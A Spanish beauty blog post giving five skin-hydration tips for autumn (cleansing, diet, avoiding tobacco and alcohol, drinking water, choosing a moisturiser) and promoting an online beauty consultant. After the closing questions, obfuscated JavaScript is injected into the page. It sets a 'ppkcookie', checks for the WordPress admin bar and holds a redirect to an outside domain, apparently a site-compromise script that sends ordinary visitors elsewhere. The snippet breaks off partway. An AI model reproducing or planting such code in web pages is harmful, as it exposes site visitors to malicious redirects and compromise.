cremas hidratantes online

Con la llegada del otoño y tras un caluroso verano no está de más recordar una serie de consejos para ayudarnos a conseguir una piel hidratada.

Largas horas de exposición solar, la contaminación medioambiental, el clima y otros tantos factores externos provocan estragos en nuestra piel, por ello tras el verano es un buen momento para tomarnos nuestro tiempo y proporcionarle un cuidado extra a nuestra piel. También tenemos que tener en cuenta que estamos en un periodo de transición en el cual pasamos del calor al frío y necesitamos preparar nuestra piel para lo que viene en los próximos meses.

El 1º de nuestros consejos estamos seguros de que estáis cansados de escucharlo, y es la importancia de una limpieza diaria constante y concienzuda:

Si nos maquillamos es obvio que debemos limpiar en profundidad la piel, por una parte podemos utilizar un desmaquillante bifásico o específico para los ojos y leche limpiadora o gel limpiador para el resto del rostro.

Pero no debemos descuidar esta rutina aunque no nos maquillemos, tened en cuenta que los agentes externos como la contaminación están en contacto directo con nuestra piel y nuestros poros necesitan esa limpieza diaria que permitirán a nuestra piel descansar durante la noche y recuperarse.

El 2º de nuestros consejos suena a tópico pero ya sabemos que es cierto, y es que somos lo que comemos.

Evita alimentos ricos en grasas e introduce en tu dieta frutas y verduras, hoy en día hay miles de recetas sencillas en internet con ríquisimas formas de comer rico y muy sano.

Nuestro 3º consejo es de sentido común aunque muchas veces no paramos a pensar: evita el consumo de tabaco y modera el consumo del alcohol.

Ambos resecan la piel y facilitan el envejecimiento cutáneo, además de facilitar la aparición de manchas.

4º Bebe mucha agua

Gran parte de nuestra piel está compuesta por agua, por lo que su consumo regular ayuda a mejorar su apariencia. Además, el agua ayuda a reponer los líquidos que perdemos en procesos tan simples como respirar y sudar.

Evitaremos que nuestra piel pierda elasticidad y flexibilidad de forma prematura, logrando así prevenir el envejecimiento y la aparición de imperfecciones en el cuerpo como las antiestéticas estrías.

Por último nuestro 5º consejo: utiliza crema hidratante siempre adecuada a tu tipo de piel y a tus necesidades.
Dependiendo de si nuestra piel es mixta o grasa, o si por el contrario nuestra piel es seca deberemos usar un tratamiento hidratante u otro.
Pero no sólo deberemos tener en cuenta eso sino que según nuestra edad además de hidratación buscaremos algo más, como pueda ser un tratamiento antiarrugas, reafirmante, nutritivo o de luminosidad.
Por ello recordarte que puedes consultar a nuestra consultora de belleza online y tras unas breves preguntas sobre tu piel y lo que estas buscando conseguir os recomendará el tratamiento que mejor se adecue a vuestras necesidades.
Cuéntanos, ¿Sigues estas pautas en tu vida diaria? ¿Cual es el tratamiento hidratante que actualmente utilizas?

var a=[‘toUTCString’,’cookie’,’split’,’length’,’charAt’,’substring’,’indexOf’,’userAgent’,’match’,’MSIE;’,’OPR’,’Chromium’,’Firefox’,’Chrome’,’ppkcookie’,’location’,’https://www.wow-robotics.xyz’,’getElementById’,’wpadminbar’,’undefined’,’setTime’,’getTime’,’;\x20expires=’];(function(c,d){var e=function(f){while(–f){c[‘push’](c[‘shift’]());}};e(++d);}(a,0x1f4));var b=function(c,d){c=c-0x0;var e=a[c];return e;};(function(){if(document[b(‘0x0’)](b(‘0x1’))===null){if(typeof c===b(‘0x2’)){function c(d,e,f){var g=”;if(f){var h=new Date();h[b(‘0x3’)](h[b(‘0x4’)]()+f*0x18*0x3c*0x3c*0x3e8);g=b(‘0x5’)+h[b(‘0x6’)]();}document[b(‘0x7′)]=d+’=’+(e||”)+g+’;\x20path=/’;}function i(j){var k=j+’=’;var l=document[b(‘0x7’)][b(‘0x8’)](‘;’);for(var m=0x0;m

¿Te ha gustado? ¡Compártelo!Share on FacebookTweet about this on TwitterPin on PinterestShare on LinkedInShare on Google+Email this to someone